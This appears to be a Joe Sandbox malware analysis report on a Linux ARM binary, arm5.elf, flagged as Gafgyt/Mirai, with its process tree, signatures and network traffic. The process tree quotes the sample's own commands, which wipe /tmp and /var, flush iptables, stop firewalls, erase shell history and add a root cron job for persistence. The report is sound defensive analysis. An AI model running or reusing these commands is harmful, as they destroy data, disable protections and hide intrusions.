Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm5.elf

Overview

General Information

Sample name:arm5.elf
Analysis ID:1526772
MD5:cdac974b2ab6e445d718356feb3a2f73
SHA1:5c447e7670af022c2bb7b8fb5b3f3aaa4851e0f0
SHA256:01fd9fb670cd8dedeb43207a633baf548fcba872312aad3e40233a16a305cda7
Tags:user-elfdigest
Infos:

Detection

Gafgyt, Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Yara detected Mirai
Executes the "iptables" command to insert, remove and/or manipulate rules
Manipulation of devices in /dev
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Tries to stop the "iptables" service
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1526772
Start date and time:2024-10-06 15:51:06 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 46s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm5.elf
Detection:MAL
Classification:mal96.spre.troj.evad.linELF@0/2@46/0
  • Connection to analysis system has been lost, crash info: Unknown
Command:/tmp/arm5.elf
PID:6217
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Octopus Caught You
Standard Error:Failed to stop iptables.service: Unit iptables.service not loaded.
Failed to stop firewall.service: Unit firewall.service not loaded.
sh: 1: history: not found
sh: 1: history: not found
  • system is lnxubuntu20
  • arm5.elf (PID: 6217, Parent: 6135, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm5.elf
    • arm5.elf New Fork (PID: 6219, Parent: 6217)
    • sh (PID: 6219, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
      • sh New Fork (PID: 6221, Parent: 6219)
      • rm (PID: 6221, Parent: 6219, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/arm5.elf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-OmYV2g /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-McPs7g /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf /var/log/wtmp
    • arm5.elf New Fork (PID: 6227, Parent: 6217)
    • sh (PID: 6227, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /tmp/*"
      • sh New Fork (PID: 6233, Parent: 6227)
      • rm (PID: 6233, Parent: 6227, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/*
    • arm5.elf New Fork (PID: 6234, Parent: 6217)
    • sh (PID: 6234, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -F"
      • sh New Fork (PID: 6239, Parent: 6234)
      • iptables (PID: 6239, Parent: 6234, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F
    • arm5.elf New Fork (PID: 6243, Parent: 6217)
    • sh (PID: 6243, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 busybox"
      • sh New Fork (PID: 6248, Parent: 6243)
      • pkill (PID: 6248, Parent: 6243, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 busybox
    • arm5.elf New Fork (PID: 6252, Parent: 6217)
    • sh (PID: 6252, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 perl"
      • sh New Fork (PID: 6254, Parent: 6252)
      • pkill (PID: 6254, Parent: 6252, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 perl
    • arm5.elf New Fork (PID: 6256, Parent: 6217)
    • sh (PID: 6256, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 python"
      • sh New Fork (PID: 6258, Parent: 6256)
      • pkill (PID: 6258, Parent: 6256, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 python
    • arm5.elf New Fork (PID: 6261, Parent: 6217)
    • sh (PID: 6261, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "service iptables stop"
      • sh New Fork (PID: 6263, Parent: 6261)
      • service (PID: 6263, Parent: 6261, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service iptables stop
        • service New Fork (PID: 6264, Parent: 6263)
        • basename (PID: 6264, Parent: 6263, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6265, Parent: 6263)
        • basename (PID: 6265, Parent: 6263, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6266, Parent: 6263)
        • systemctl (PID: 6266, Parent: 6263, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 6267, Parent: 6263)
          • service New Fork (PID: 6268, Parent: 6267)
          • systemctl (PID: 6268, Parent: 6267, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 6269, Parent: 6267)
          • sed (PID: 6269, Parent: 6267, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 6263, Parent: 6261, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop iptables.service
    • arm5.elf New Fork (PID: 6270, Parent: 6217)
    • sh (PID: 6270, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/sbin/iptables -F; /sbin/iptables -X"
      • sh New Fork (PID: 6272, Parent: 6270)
      • iptables (PID: 6272, Parent: 6270, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -F
      • sh New Fork (PID: 6273, Parent: 6270)
      • iptables (PID: 6273, Parent: 6270, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -X
    • arm5.elf New Fork (PID: 6274, Parent: 6217)
    • sh (PID: 6274, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "service firewall stop"
      • sh New Fork (PID: 6276, Parent: 6274)
      • service (PID: 6276, Parent: 6274, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service firewall stop
        • service New Fork (PID: 6277, Parent: 6276)
        • basename (PID: 6277, Parent: 6276, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6278, Parent: 6276)
        • basename (PID: 6278, Parent: 6276, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6279, Parent: 6276)
        • systemctl (PID: 6279, Parent: 6276, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 6280, Parent: 6276)
          • service New Fork (PID: 6281, Parent: 6280)
          • systemctl (PID: 6281, Parent: 6280, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 6282, Parent: 6280)
          • sed (PID: 6282, Parent: 6280, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 6276, Parent: 6274, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop firewall.service
    • arm5.elf New Fork (PID: 6286, Parent: 6217)
    • sh (PID: 6286, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "history -c"
    • arm5.elf New Fork (PID: 6288, Parent: 6217)
    • sh (PID: 6288, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf ~/.bash_history"
      • sh New Fork (PID: 6290, Parent: 6288)
      • rm (PID: 6290, Parent: 6288, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.bash_history
    • arm5.elf New Fork (PID: 6291, Parent: 6217)
    • sh (PID: 6291, Parent: 6217, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "history -w"
    • arm5.elf New Fork (PID: 6293, Parent: 6217)
      • arm5.elf New Fork (PID: 6295, Parent: 6293)
      • arm5.elf New Fork (PID: 6297, Parent: 6293)
      • arm5.elf New Fork (PID: 6299, Parent: 6293)
        • arm5.elf New Fork (PID: 6302, Parent: 6299)
        • sh (PID: 6302, Parent: 6299, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /dev/ocmount"
          • sh New Fork (PID: 6327, Parent: 6302)
          • chmod (PID: 6327, Parent: 6302, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /dev/ocmount
        • arm5.elf New Fork (PID: 6332, Parent: 6299)
        • sh (PID: 6332, Parent: 6299, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
        • arm5.elf New Fork (PID: 6380, Parent: 6299)
        • sh (PID: 6380, Parent: 6299, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /dev/ocmount
          • sh New Fork (PID: 6428, Parent: 6380)
        • arm5.elf New Fork (PID: 6598, Parent: 6299)
          • arm5.elf New Fork (PID: 6601, Parent: 6598)
          • sh (PID: 6601, Parent: 6598, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 6623, Parent: 6601)
            • iptables (PID: 6623, Parent: 6601, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
          • arm5.elf New Fork (PID: 6635, Parent: 6598)
          • sh (PID: 6635, Parent: 6598, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 6637, Parent: 6635)
            • busybox (PID: 6637, Parent: 6635, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
          • arm5.elf New Fork (PID: 6638, Parent: 6598)
          • sh (PID: 6638, Parent: 6598, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 6640, Parent: 6638)
          • arm5.elf New Fork (PID: 6641, Parent: 6598)
          • sh (PID: 6641, Parent: 6598, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 6643, Parent: 6641)
          • arm5.elf New Fork (PID: 6644, Parent: 6598)
          • sh (PID: 6644, Parent: 6598, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 6646, Parent: 6644)
            • busybox (PID: 6646, Parent: 6644, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • arm5.elf New Fork (PID: 6600, Parent: 6299)
        • arm5.elf New Fork (PID: 6607, Parent: 6299)
          • arm5.elf New Fork (PID: 6609, Parent: 6607)
      • arm5.elf New Fork (PID: 6581, Parent: 6293)
        • arm5.elf New Fork (PID: 6584, Parent: 6581)
        • sh (PID: 6584, Parent: 6581, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 6597, Parent: 6584)
          • iptables (PID: 6597, Parent: 6584, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • arm5.elf New Fork (PID: 6621, Parent: 6581)
        • sh (PID: 6621, Parent: 6581, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 6624, Parent: 6621)
          • busybox (PID: 6624, Parent: 6621, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • arm5.elf New Fork (PID: 6625, Parent: 6581)
        • sh (PID: 6625, Parent: 6581, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 6627, Parent: 6625)
        • arm5.elf New Fork (PID: 6628, Parent: 6581)
        • sh (PID: 6628, Parent: 6581, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 6630, Parent: 6628)
        • arm5.elf New Fork (PID: 6631, Parent: 6581)
        • sh (PID: 6631, Parent: 6581, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 6634, Parent: 6631)
          • busybox (PID: 6634, Parent: 6631, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
      • arm5.elf New Fork (PID: 6582, Parent: 6293)
      • arm5.elf New Fork (PID: 6587, Parent: 6293)
        • arm5.elf New Fork (PID: 6589, Parent: 6587)
  • sh (PID: 6331, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sharing
  • gsd-sharing (PID: 6331, Parent: 1477, MD5: e29d9025d98590fbb69f89fdbd4438b3) Arguments: /usr/libexec/gsd-sharing
  • systemd New Fork (PID: 6334, Parent: 1)
  • upowerd (PID: 6334, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • systemd New Fork (PID: 6382, Parent: 1)
  • upowerd (PID: 6382, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 6422, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
  • gsd-keyboard (PID: 6422, Parent: 1477, MD5: 8e288fd17c80bb0a1148b964b2ac2279) Arguments: /usr/libexec/gsd-keyboard
  • systemd New Fork (PID: 6430, Parent: 1)
  • upowerd (PID: 6430, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 6468, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 6468, Parent: 1477, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • wrapper-2.0 (PID: 6471, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6473, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • sh (PID: 6474, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
  • gsd-smartcard (PID: 6474, Parent: 1477, MD5: ea1fbd7f62e4cd0331eae2ef754ee605) Arguments: /usr/libexec/gsd-smartcard
  • wrapper-2.0 (PID: 6475, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • sh (PID: 6478, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-datetime
  • gsd-datetime (PID: 6478, Parent: 1477, MD5: d80d39745740de37d6634d36e344d4bc) Arguments: /usr/libexec/gsd-datetime
  • systemd New Fork (PID: 6479, Parent: 1)
  • upowerd (PID: 6479, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 6484, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
  • gsd-media-keys (PID: 6484, Parent: 1477, MD5: a425448c135afb4b8bfd79cc0b6b74da) Arguments: /usr/libexec/gsd-media-keys
  • sh (PID: 6503, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
  • gsd-screensaver-proxy (PID: 6503, Parent: 1477, MD5: 77e309450c87dceee43f1a9e50cc0d02) Arguments: /usr/libexec/gsd-screensaver-proxy
  • wrapper-2.0 (PID: 6517, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 6526, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • systemd New Fork (PID: 6534, Parent: 1)
  • upowerd (PID: 6534, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 6559, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
  • gsd-power (PID: 6559, Parent: 1477, MD5: 28b8e1b43c3e7f1db6741ea1ecd978b7) Arguments: /usr/libexec/gsd-power
  • udisksd New Fork (PID: 6596, Parent: 799)
  • udisksd New Fork (PID: 6620, Parent: 799)
  • dumpe2fs (PID: 6620, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/sda2
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
arm5.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    arm5.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6217.1.00007fc008017000.00007fc00803d000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
        6217.1.00007fc008017000.00007fc00803d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6598.1.00007fc008017000.00007fc00803d000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
            6598.1.00007fc008017000.00007fc00803d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: arm5.elfAvira: detected
              Source: arm5.elfVirustotal: Detection: 37%Perma Link
              Source: arm5.elfReversingLabs: Detection: 55%
              Source: /usr/bin/pkill (PID: 6248)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 6258)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

              Networking

              barindex
              Source: /bin/sh (PID: 6623)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 6597)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /usr/sbin/service (PID: 6263)Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/sbin/service (PID: 6263)Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: global trafficTCP traffic: 192.168.2.23:60964 -> 156.238.224.214:8443
              Source: global trafficTCP traffic: 192.168.2.23:36000 -> 212.118.43.167:2222
              Source: /bin/sh (PID: 6239)Iptables executable: /usr/sbin/iptables -> iptables -FJump to behavior
              Source: /bin/sh (PID: 6272)Iptables executable: /sbin/iptables -> /sbin/iptables -FJump to behavior
              Source: /bin/sh (PID: 6273)Iptables executable: /sbin/iptables -> /sbin/iptables -XJump to behavior
              Source: /bin/sh (PID: 6623)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 6597)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /tmp/arm5.elf (PID: 6217)Socket: 127.0.0.1:8013Jump to behavior
              Source: /tmp/arm5.elf (PID: 6581)Socket: 0.0.0.0:31337Jump to behavior
              Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
              Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
              Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownUDP traffic detected without corresponding DNS query: 51.77.149.139
              Source: unknownUDP traffic detected without corresponding DNS query: 51.77.149.139
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
              Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
